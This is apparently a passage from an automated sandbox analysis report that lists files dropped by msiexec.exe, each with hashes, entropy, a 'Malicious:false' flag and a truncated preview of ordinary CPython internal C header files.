                                                                                                                                SHA-512:0FE2B08322351D91876C45420D41A6160F6764BF72ABDE75FE99FA99255A0C8853A97038C33662490A2AA100D4A15472E0FCFD5872D6CE9EA9610497DE8DB92A
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_COMPILE_H..#define Py_INTERNAL_COMPILE_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....struct _arena; // Type defined in pycore_pyarena.h..struct _mod; // Type defined in pycore_ast.h....// Export the symbol for test_peg_generator (built as a library)..PyAPI_FUNC(PyCodeObject*) _PyAST_Compile(.. struct _mod *mod,.. PyObject *filename,.. PyCompilerFlags *flags,.. int optimize,.. struct _arena *arena);..extern PyFutureFeatures* _PyFuture_FromAST(.. struct _mod * mod,.. PyObject *filename.. );....extern PyObject* _Py_Mangle(PyObject *p, PyObject *name);....typedef struct {.. int optimize;.. int ff_features;.... int recursion_depth; /* current recursion depth */.. int recursion_limit; /* recursion limit */..} _PyASTOptimizeState;....extern int _PyAST_Optimize(.. struct _mod *,.. struct _arena *arena,.. _PyASTOptim
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2936
                                                                                                                                Entropy (8bit):5.175874369919254
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:goxxba4gRdtyHpGaenltskUWimGMfjlczGLSCS1N9ajkBSrYOIsDQUIp:Px+4CtyVenFimrZhkZaNkZ
                                                                                                                                MD5:5D902EE0239275761AA1C82057C9B052
                                                                                                                                SHA1:4D6B88069CD1381567140FF1EB69C20CEEED53EB
                                                                                                                                SHA-256:B257B9B1C3A0DFA548E2C7E780F9FC8AD388FD640ABF55F7501298B8FF07328C
                                                                                                                                SHA-512:7EB318F8FF1F4A2652F7107EB6E2AC8B856917C19C30DD1DDA83D5839315A380C2D40AB0A74AB5F0581BDA13E368A52968514BFACB4E72106093F41D4F1C9DFF
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_CONDVAR_H..#define Py_INTERNAL_CONDVAR_H....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#ifndef _POSIX_THREADS../* This means pthreads are not implemented in libc headers, hence the macro.. not present in unistd.h. But they still can be implemented as an external.. library (e.g. gnu pth in pthread emulation) */..# ifdef HAVE_PTHREAD_H..# include <pthread.h> /* _POSIX_THREADS */..# endif..#endif....#ifdef _POSIX_THREADS../*.. * POSIX support.. */..#define Py_HAVE_CONDVAR....#ifdef HAVE_PTHREAD_H..# include <pthread.h>..#endif....#define PyMUTEX_T pthread_mutex_t..#define PyCOND_T pthread_cond_t....#elif defined(NT_THREADS)../*.. * Windows (XP, 2003 server and later, as well as (hopefully) CE) support.. *.. * Emulated condition variables ones that work with XP and later, plus.. * example native support on VISTA and onwards... */..#define Py_HAVE_CONDVAR..../* include windows if it hasn't been done before */..#define WIN
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1306
                                                                                                                                Entropy (8bit):5.1249199806565855
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:gqLPxwUZaGUbtPuHbXOK6EGV4/dxok2ynFvXoBnP:gCPxbajPgb+Ebdmk2ynFvXolP
                                                                                                                                MD5:8E1299A606C2611B629097B80204DF85
                                                                                                                                SHA1:9AF9ACA825C5A62786D6B0CDACEC26A4794E2602
                                                                                                                                SHA-256:4D6F1267A0CD6508A558116EFD98C801D316BF880E97983415F6D41DAFFDE955
                                                                                                                                SHA-512:5EC25FB189A6E2B9A5CA0F18389C50222639CD41DC603414713373F5E223DB51CE13877F08158A6948C3F25E963827520769F32B267A83F3F916F3FAB60766F4
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_CONTEXT_H..#define Py_INTERNAL_CONTEXT_H....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pycore_hamt.h" /* PyHamtObject */......extern PyTypeObject _PyContextTokenMissing_Type;..../* runtime lifecycle */....PyStatus _PyContext_Init(PyInterpreterState *);..void _PyContext_Fini(PyInterpreterState *);....../* other API */....#ifndef WITH_FREELISTS..// without freelists..# define PyContext_MAXFREELIST 0..#endif....#ifndef PyContext_MAXFREELIST..# define PyContext_MAXFREELIST 255..#endif....struct _Py_context_state {..#if PyContext_MAXFREELIST > 0.. // List of free PyContext objects.. PyContext *freelist;.. int numfree;..#endif..};....struct _pycontextobject {.. PyObject_HEAD.. PyContext *ctx_prev;.. PyHamtObject *ctx_vars;.. PyObject *ctx_weakreflist;.. int ctx_entered;..};......struct _pycontextvarobject {.. PyObject_HEAD.. PyObject *var_name;.. PyObject *var_default;.. PyObject
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5862
                                                                                                                                Entropy (8bit):5.305028154258039
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:qx+pafI4QjyX821unIg043docEKsKx6IYoKW0mTXkblHGCvgxKOn:qcIgyXB1unIIrBx6IDKW05i
                                                                                                                                MD5:B8900F849CE8C1958CFBC8BA6AE3AE5E
                                                                                                                                SHA1:E377DA28E154499E31F1C8FDD9134584EA208072
                                                                                                                                SHA-256:7269D5BB10F7BE76934BB82A55C0F3BBDDAF98F20655A0580C91461E541B2456
                                                                                                                                SHA-512:8746D706E05FDDCA210E9BB2B0BB1A54D14B91937F6CFD95B560F5F10AC3B9336E41CE7472CB849278ACB7EE9F8602FAFC731EE9483A58D8B0632587F6C5BFCA
                                                                                                                                Malicious:false
                                                                                                                                Preview:..#ifndef Py_INTERNAL_DICT_H..#define Py_INTERNAL_DICT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....../* runtime lifecycle */....extern void _PyDict_Fini(PyInterpreterState *interp);....../* other API */....#ifndef WITH_FREELISTS..// without freelists..# define PyDict_MAXFREELIST 0..#endif....#ifndef PyDict_MAXFREELIST..# define PyDict_MAXFREELIST 80..#endif....struct _Py_dict_state {..#if PyDict_MAXFREELIST > 0.. /* Dictionary reuse scheme to save calls to malloc and free */.. PyDictObject *free_list[PyDict_MAXFREELIST];.. int numfree;.. PyDictKeysObject *keys_free_list[PyDict_MAXFREELIST];.. int keys_numfree;..#endif..};....typedef struct {.. /* Cached hash code of me_key. */.. Py_hash_t me_hash;.. PyObject *me_key;.. PyObject *me_value; /* This field is only meaningful for combined tables */..} PyDictKeyEntry;....typedef struct {.. PyObject *me_key; /* The key m
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):732
                                                                                                                                Entropy (8bit):5.185396990445516
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:R4r3Z/HQUZaQGIUAsGNg0t08dlS9oOYZNE5Q7ezdlAfOZnrufOHvyOP3q8vk08K:6xwUZaGUb5uJdSyNyy8dlAWZrXP3KJK
                                                                                                                                MD5:E08BF583DE8FE61843369977BB14A7DC
                                                                                                                                SHA1:68F2BC155DF4135940B1A8EEC30D117EE403F306
                                                                                                                                SHA-256:F9F7F48CE0A65C21A3F86F97682B7E5B70544B2FE6E265EF0304421C3710BED1
                                                                                                                                SHA-512:964792EF6CF3626C1FBB8ECDFB6E89958EDCE062FA05ED615429DE2F3EC0BB15447930CAD09FF3A3D6F9DFDD0708DD58EBA9AAA99D56DD0AAFFAC8DDC28C6E53
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pycore_pymath.h" // _PY_SHORT_FLOAT_REPR......#if _PY_SHORT_FLOAT_REPR == 1..../* These functions are used by modules compiled as C extension like math:.. they must be exported. */....PyAPI_FUNC(double) _Py_dg_strtod(const char *str, char **ptr);..PyAPI_FUNC(char *) _Py_dg_dtoa(double d, int mode, int ndigits,.. int *decpt, int *sign, char **rve);..PyAPI_FUNC(void) _Py_dg_freedtoa(char *s);..PyAPI_FUNC(double) _Py_dg_stdnan(int sign);..PyAPI_FUNC(double) _Py_dg_infinity(int sign);....#endif // _PY_SHORT_FLOAT_REPR == 1....#ifdef __cplusplus..}..#endif..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):587
                                                                                                                                Entropy (8bit):5.12027802082258
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:BVdMqc+cOV+WOO3EOOoHTHrp2vOOiHppCMYOOoHTHqVO/aWHppppCMKW+cOV+Vd:hVC21g6C++VIaW2xxC
                                                                                                                                MD5:50E3323F757269062FEA568BCA3389C2
                                                                                                                                SHA1:1B21F6B0D8D55E881BDE2F13AE53282B0B4AD198
                                                                                                                                SHA-256:F2A9789DA02C3FF76C175567B3E842009903F800FE4AB65D008D9B9BEF4D157E
                                                                                                                                SHA-512:27F02F5EF388C20E6F77F6512F97109A63B49C34FACB19886EF8B33EDD91BCA15C18AF27E4C37048E3EE609CBA84DA494B19176F9D5FDD2D0787C31DFD58FFDE
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_EMSCRIPTEN_SIGNAL_H..#define Py_EMSCRIPTEN_SIGNAL_H....#if defined(__EMSCRIPTEN__)....void.._Py_CheckEmscriptenSignals(void);....void.._Py_CheckEmscriptenSignalsPeriodically(void);....#define _Py_CHECK_EMSCRIPTEN_SIGNALS() _Py_CheckEmscriptenSignals()....#define _Py_CHECK_EMSCRIPTEN_SIGNALS_PERIODICALLY() _Py_CheckEmscriptenSignalsPeriodically()....extern int Py_EMSCRIPTEN_SIGNAL_HANDLING;....#else....#define _Py_CHECK_EMSCRIPTEN_SIGNALS()..#define _Py_CHECK_EMSCRIPTEN_SIGNALS_PERIODICALLY()....#endif // defined(__EMSCRIPTEN__)....#endif // ndef Py_EMSCRIPTEN_SIGNAL_H..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):879
                                                                                                                                Entropy (8bit):5.0758133430691315
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:B6YeLY84r3Z/HQUZaQGIsESAG1JyeAKUcVpBANe2WFEXeiiGD1Aw1OnY7:g9LUxwUZaGsS+JOK0N0EXe9GD1ARnA
                                                                                                                                MD5:2C238166349A8949860259160097DC22
                                                                                                                                SHA1:FDE3650365938159404D50D3356A0D98FEDAA15A
                                                                                                                                SHA-256:74E2B1374FF5A4E98774FC0F089914DBBA738F32C6AE338336AE97AB03E96436
                                                                                                                                SHA-512:0BB3B298CBFC3632453EC02BDF48E177FD60A6003309D951AB021A50193E5C5C4E03059BB69A9C808D9EDA246233C16FD89E204FD821F0DE305B6777947D63C7
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_EXCEPTIONS_H..#define Py_INTERNAL_EXCEPTIONS_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....../* runtime lifecycle */....extern PyStatus _PyExc_InitState(PyInterpreterState *);..extern PyStatus _PyExc_InitGlobalObjects(PyInterpreterState *);..extern int _PyExc_InitTypes(PyInterpreterState *);..extern void _PyExc_Fini(PyInterpreterState *);....../* other API */....struct _Py_exc_state {.. // The dict mapping from errno codes to OSError subclasses.. PyObject *errnomap;.. PyBaseExceptionObject *memerrors_freelist;.. int memerrors_numfree;.. // The ExceptionGroup type.. PyObject *PyExc_ExceptionGroup;..};....extern void _PyExc_ClearExceptionGroupType(PyInterpreterState *);......#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_EXCEPTIONS_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7588
                                                                                                                                Entropy (8bit):5.135412655477695
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:7V8JZHm7HEZ4JqBhfz9X7oKfuV6ZeDaQf:yWwZ4JqBhdFuV6MHf
                                                                                                                                MD5:49B19AAB798C9E4E44BDD8EA9CA5F3A1
                                                                                                                                SHA1:D08A248E0FE562910310297E3E31C64EC3FB70E2
                                                                                                                                SHA-256:563A937090C36A23597EAED491EBB59B33B8C988B4AAA0692B073F902220A303
                                                                                                                                SHA-512:B953F29248D64FE57998C88BD39492000C3D74648897C67E83A1E9F5D3C5B81DD2E5E53E4332E4D038329F2F77548DFE335FC21CF79D35989AD6D694D301BB0B
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_FILEUTILS_H..#define Py_INTERNAL_FILEUTILS_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "Py_BUILD_CORE must be defined to include this header"..#endif....#include <locale.h> /* struct lconv */....typedef enum {.. _Py_ERROR_UNKNOWN=0,.. _Py_ERROR_STRICT,.. _Py_ERROR_SURROGATEESCAPE,.. _Py_ERROR_REPLACE,.. _Py_ERROR_IGNORE,.. _Py_ERROR_BACKSLASHREPLACE,.. _Py_ERROR_SURROGATEPASS,.. _Py_ERROR_XMLCHARREFREPLACE,.. _Py_ERROR_OTHER..} _Py_error_handler;....PyAPI_FUNC(_Py_error_handler) _Py_GetErrorHandler(const char *errors);....PyAPI_FUNC(int) _Py_DecodeLocaleEx(.. const char *arg,.. wchar_t **wstr,.. size_t *wlen,.. const char **reason,.. int current_locale,.. _Py_error_handler errors);....PyAPI_FUNC(int) _Py_EncodeLocaleEx(.. const wchar_t *text,.. char **str,.. size_t *error_pos,.. const char **reason,.. int current_locale,.. _Py_error_handler errors);....PyAPI_FUNC(char
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1366
                                                                                                                                Entropy (8bit):5.212726494910524
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:g8LlxwUZaGNSndkx9Jh6HLwElu05b6yt8hvqY7nF:gslxba+tx9KHLg05jt85FbF
                                                                                                                                MD5:D3E39DB786DB6C2ED59A5D2671D74AA9
                                                                                                                                SHA1:B83C61A48EEFF062EFABECAB3A211487EC70FD36
                                                                                                                                SHA-256:D3701129280C50FE67C75CED01EFF02F0375AF58A2C0B3BD88978CA8C2D51BAD
                                                                                                                                SHA-512:71B0E7DA8B7C55D85B9E3C71C449C3475594EE7986CE6C1459E2EB3C0B36663482B0E519483CF8C4F44963FA1BBB71739F0D0809C74C39498996C438BD60644D
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_FLOATOBJECT_H..#define Py_INTERNAL_FLOATOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....../* runtime lifecycle */....extern void _PyFloat_InitState(PyInterpreterState *);..extern PyStatus _PyFloat_InitTypes(PyInterpreterState *);..extern void _PyFloat_Fini(PyInterpreterState *);..extern void _PyFloat_FiniType(PyInterpreterState *);....../* other API */....#ifndef WITH_FREELISTS..// without freelists..# define PyFloat_MAXFREELIST 0..#endif....#ifndef PyFloat_MAXFREELIST..# define PyFloat_MAXFREELIST 100..#endif....struct _Py_float_state {..#if PyFloat_MAXFREELIST > 0.. /* Special free list.. free_list is a singly-linked list of available PyFloatObjects,.. linked via abuse of their ob_type members. */.. int numfree;.. PyFloatObject *free_list;..#endif..};....void _PyFloat_ExactDealloc(PyObject *op);......PyAPI_FUNC(void) _PyFloat_DebugMallocStats(FILE*
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):555
                                                                                                                                Entropy (8bit):5.1195933268115255
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:B6e6eLe684r3Z/HQUZaQGIEK8TwYZ4XUOvyqMne67:geHLe6xwUZaGEK8TiUOLMneu
                                                                                                                                MD5:EA2819C29B4A212BD4509E2820342E32
                                                                                                                                SHA1:DB689C92E6E20ED1E262C2BFB88F4D51A69F9BBC
                                                                                                                                SHA-256:524D191CAE333435CA36941FA390C9CB3A1EEE8B3A0375CC61DF4AA246047D58
                                                                                                                                SHA-512:175411A20A68ED21743A7CC05C3D0D89F86350CFDBD0C363DD843B323A412604F2DA172C30D93434ACD857C74127D69689F9DAA744446F6949D9FDC6F3645DF9
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_FORMAT_H..#define Py_INTERNAL_FORMAT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif..../* Format codes.. * F_LJUST '-'.. * F_SIGN '+'.. * F_BLANK ' '.. * F_ALT '#'.. * F_ZERO '0'.. * F_NO_NEG_0 'z'.. */..#define F_LJUST (1<<0)..#define F_SIGN (1<<1)..#define F_BLANK (1<<2)..#define F_ALT (1<<3)..#define F_ZERO (1<<4)..#define F_NO_NEG_0 (1<<5)....#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_FORMAT_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7691
                                                                                                                                Entropy (8bit):5.0698734348492005
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:CPhS9oUqgtKiatCfmpB5cplZ1p3jTYeYKeXWzYRgMg/RtoSpmxVRgzqAgf:CPhY4BiNmpwPD3vl+WzvMgptoFcW
                                                                                                                                MD5:FB593D17FBAF7086D9E8174EF3876A0A
                                                                                                                                SHA1:D30727587419A704612F9E46BB231B58B53C7D68
                                                                                                                                SHA-256:E24B40EC2A6DCF369EB4611AAFCDA43090C9A87BEEC2685DFD8DA274BFD4F32A
                                                                                                                                SHA-512:37C1E763B352FB06739A276EE61A6CCC636416A9A9FCFEA97B7BDCC2107DB87B619C2A9ABCF0B8329EF6D9DDDA30A8B652EAE241493639077E968710EE3EFF42
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_FRAME_H..#define Py_INTERNAL_FRAME_H..#ifdef __cplusplus..extern "C" {..#endif....#include <stdbool.h>..#include <stddef.h>..../* See Objects/frame_layout.md for an explanation of the frame stack.. * including explanation of the PyFrameObject and _PyInterpreterFrame.. * structs. */......struct _frame {.. PyObject_HEAD.. PyFrameObject *f_back; /* previous frame, or NULL */.. struct _PyInterpreterFrame *f_frame; /* points to the frame data */.. PyObject *f_trace; /* Trace function */.. int f_lineno; /* Current line number. Only valid if non-zero */.. char f_trace_lines; /* Emit per-line trace events? */.. char f_trace_opcodes; /* Emit per-opcode trace events? */.. char f_fast_as_locals; /* Have the fast locals of this frame been converted to a dict? */.. /* The frame data, if this frame object owns the frame */.. PyObject *_f_frame_data[1];..};....extern PyFrameObject* _PyFrame_New_NoTrack(Py
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):431
                                                                                                                                Entropy (8bit):5.191496767694097
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:B6kytWALkytR4r3Z/HQUZaQGI2SEMKEBQADybLNnkyw7v:gk0WALk06xwUZaG24QA+bLNnknr
                                                                                                                                MD5:0720B206EF7649EE7F1BAF40CB544151
                                                                                                                                SHA1:D30FCF510302C5EAF44733781ECE0325335C2650
                                                                                                                                SHA-256:DCE0FE1C82CB8320920751C060F0C05027830B6B2969BA08A1847C5ACC97D989
                                                                                                                                SHA-512:6A821FF202EAE17DE7C62235E21042234CB335490C35C835B74639C9898EB1229B932A8245295AD4C9E27920634E280D3444C463A0BF9644868B1596C8454A4D
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_FUNCTION_H..#define Py_INTERNAL_FUNCTION_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....extern PyFunctionObject* _PyFunction_FromConstructor(PyFrameConstructor *constr);....extern uint32_t _PyFunction_GetVersionForCurrentState(PyFunctionObject *func);....#ifdef __cplusplus..}..#endif..#endif /* !Py_INTERNAL_FUNCTION_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7078
                                                                                                                                Entropy (8bit):5.025668684672826
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:Nx+FW3BcR7nES4MgFKi+ig/xBTVWI7q4OB+CCji1ddmNkFC0Fr4bHO:NcA3Bw7nExFCj/TV64G1qa4jO
                                                                                                                                MD5:397396A194ADE67E833C3CB9C41BEB61
                                                                                                                                SHA1:522E9949EC8FA572FFE4C38CBF230961DE6E0BB2
                                                                                                                                SHA-256:12FC0437E8215B64AD2EFE0C274C6BCB6EB73AF32954DA5239BE884A5ED5381C
                                                                                                                                SHA-512:567B74B82A16EB3D2B79B1B7D334302B9E16027FD99B62812F14AF173C1915779B07FAF70D5AD879008AC0819FBFE14C6D782F210E4D229474099A7B8A7E9472
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_GC_H..#define Py_INTERNAL_GC_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif..../* GC information is stored BEFORE the object structure. */..typedef struct {.. // Pointer to next object in the list... // 0 means the object is not tracked.. uintptr_t _gc_next;.... // Pointer to previous object in the list... // Lowest two bits are used for flags documented later... uintptr_t _gc_prev;..} PyGC_Head;....#define _Py_AS_GC(o) ((PyGC_Head *)(o)-1)..#define _PyGC_Head_UNUSED PyGC_Head..../* True if the object is currently tracked by the GC. */..#define _PyObject_GC_IS_TRACKED(o) (_Py_AS_GC(o)->_gc_next != 0)..../* True if the object may be tracked by the GC in the future, or already is... This can be useful to implement some optimizations. */..#define _PyObject_GC_MAY_BE_TRACKED(obj) \.. (PyObject_IS_GC(obj) && \.. (!PyTuple_CheckExact(obj) || _PyObject_GC_IS_TR
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1213
                                                                                                                                Entropy (8bit):5.247043365672187
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:g8LlxwUZaGqi1DIrByyj6/KUz73BDoXK5zbbRnF:gslxbaYcriCU/3tosxF
                                                                                                                                MD5:571376EE10835B881EED0B9D425F9186
                                                                                                                                SHA1:8E05A04420C58D94976C186752E920D121918127
                                                                                                                                SHA-256:D7BD77810901CEE6E58BC3E11E31CCBEB20B66A7E2A275F032B789633BD46B88
                                                                                                                                SHA-512:9970BF1661F6BAC916460197FEC5E753BD47386D5A2592C790DA4E727E7B45A799852B6641AD9B2F8525D21B0D10A3B7606A937A93338F7D7FA7ACEC7489695D
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_GENOBJECT_H..#define Py_INTERNAL_GENOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....extern PyObject *_PyGen_yf(PyGenObject *);..extern PyObject *_PyCoro_GetAwaitableIter(PyObject *o);..extern PyObject *_PyAsyncGenValueWrapperNew(PyObject *);..../* runtime lifecycle */....extern void _PyAsyncGen_Fini(PyInterpreterState *);....../* other API */....#ifndef WITH_FREELISTS..// without freelists..# define _PyAsyncGen_MAXFREELIST 0..#endif....#ifndef _PyAsyncGen_MAXFREELIST..# define _PyAsyncGen_MAXFREELIST 80..#endif....struct _Py_async_gen_state {..#if _PyAsyncGen_MAXFREELIST > 0.. /* Freelists boost performance 6-10%; they also reduce memory.. fragmentation, as _PyAsyncGenWrappedValue and PyAsyncGenASend.. are short-living objects that are instantiated for every.. __anext__() call. */.. struct _PyAsyncGenWrappedValue* value_freelist[_PyAsyncGen_MAXFREEL
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):512
                                                                                                                                Entropy (8bit):5.109692979030304
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:B6y3V2Ly3Jr3Z/HQUZaQGILUZJbNj0Q5doxPsLQczHLL6IGC0Pny3FPD:gc2L4xwUZaGLUZz086xPOQc7LL6IGCw4
                                                                                                                                MD5:42F00137CE3A318EE39D33DB6607E1D6
                                                                                                                                SHA1:51B472FF408EDB04A34BBE20567475D27923F814
                                                                                                                                SHA-256:4592E97F536C2AB2392057ABE08CAAA0E0E755750F2998D31637E427EC95A05C
                                                                                                                                SHA-512:C106FAEA1A2281675342B6B68A397275257245ED2404B489F699FB8149E919FF2C2AF2DF0734A1141FF4080D420C96CC9AFD760D818D50D4F4A94DC6DFE3BCBE
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_PYGETOPT_H..#define Py_INTERNAL_PYGETOPT_H....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....extern int _PyOS_opterr;..extern Py_ssize_t _PyOS_optind;..extern const wchar_t *_PyOS_optarg;....extern void _PyOS_ResetGetOpt(void);....typedef struct {.. const wchar_t *name;.. int has_arg;.. int val;..} _PyOS_LongOption;....extern int _PyOS_GetOpt(Py_ssize_t argc, wchar_t * const *argv, int *longindex);....#endif /* !Py_INTERNAL_PYGETOPT_H */..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1615
                                                                                                                                Entropy (8bit):5.019129986315321
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:g5r56xbaorcvuq0DOUJtF6XKTfebBCjIi5u:S96x+ogGVDXF/T6BEIUu
                                                                                                                                MD5:6D41BB3793B74EA9DE14983D91A06C1B
                                                                                                                                SHA1:CA5EA097370D89BEC6037413D144FBF7AE23C4A2
                                                                                                                                SHA-256:B6F1E407C086A487B896DEBE164C7D22678062CAFEDC8B248E4B5CA9B51D4EAB
                                                                                                                                SHA-512:6A4153BBE5A6A31AECBF973E4A941BF07016E16635811308B071DC5C834531077140466AB1BFBB086A66965CF1A745EE5F2F3862437C58BE5D77B6D2E64015AA
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_INTERNAL_GIL_H..#define Py_INTERNAL_GIL_H..#ifdef __cplusplus..extern "C" {..#endif....#ifndef Py_BUILD_CORE..# error "this header requires Py_BUILD_CORE define"..#endif....#include "pycore_atomic.h" /* _Py_atomic_address */..#include "pycore_condvar.h" /* PyCOND_T */....#ifndef Py_HAVE_CONDVAR..# error You need either a POSIX-compatible or a Windows system!..#endif..../* Enable if you want to force the switching of threads at least.. every `interval`. */..#undef FORCE_SWITCHING..#define FORCE_SWITCHING....struct _gil_runtime_state {.. /* microseconds (the Python API uses seconds, though) */.. unsigned long interval;.. /* Last PyThreadState holding / having held the GIL. This helps us.. know whether anyone else was scheduled after we dropped the GIL. */.. _Py_atomic_address last_holder;.. /* Whether the GIL is already taken (-1 if uninitialized). This is.. atomic because it can be read without any lock taken in ceval.c. */.. _Py_atomic_
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1490
                                                                                                                                Entropy (8bit):5.084462646164176
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:gZpLZ4xwUZaGUbub79ryXfwpPRWH/cMSwCMpmQpTIPs/an3pEpWl5/uFVrnZk:gZ1Z4xba4vPRQZpmW8r5/uFZZk
                                                                                                                                MD5:503D997A1C843ED072E741A3F91908CE
                                                                                                                                SHA1:8D7AAA66BE13F9BB45F404A59EA4FDC841B75EE2
                                                                                                                                SHA-256:556CD1C3553B0D3D0D683714428D536DAA39241C5873BDDDC46A9BAE19A03479
                                                                                                                                SHA-512:04CBF4D83888C74B82E1106DE9B0E0F91CAD171EC5F5E19D1AFC2FF1BAD2FFA48EC6DCBB7C7817836A909D543DDBA89717A723386F39D748B22DB69B8F09F2D1
                                                                                                                                Malicious:false
